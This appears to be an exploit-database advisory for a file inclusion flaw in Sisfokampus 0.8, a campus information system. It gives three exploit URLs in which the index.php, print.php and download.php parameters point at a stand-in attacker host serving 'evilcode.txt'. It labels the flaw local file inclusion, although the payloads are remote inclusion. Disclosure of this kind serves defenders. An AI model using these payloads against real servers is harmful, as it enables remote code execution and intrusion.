vendor:
Sisfokampus
by:
E. Setio Dewo and Wawan Firmansyah
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: Sisfokampus
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE: N/A
CPE: a:sisfokampus:sisfokampus:0.8
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003
Sisfokampus 0.8 Local File Include Vulnerability
Sisfokampus 0.8 is vulnerable to Local File Include vulnerability. This vulnerability can be exploited by an attacker to include malicious files from a remote server. The vulnerable files are index.php, print.php and download.php. The exploit for index.php is http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?. The exploit for print.php is http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?. The exploit for download.php is http://www.victim.com/download.php?dir=http://attacker.com/evilcode.txt?.
Mitigation:
The best way to mitigate this vulnerability is to restrict the access to the vulnerable files and validate the user input.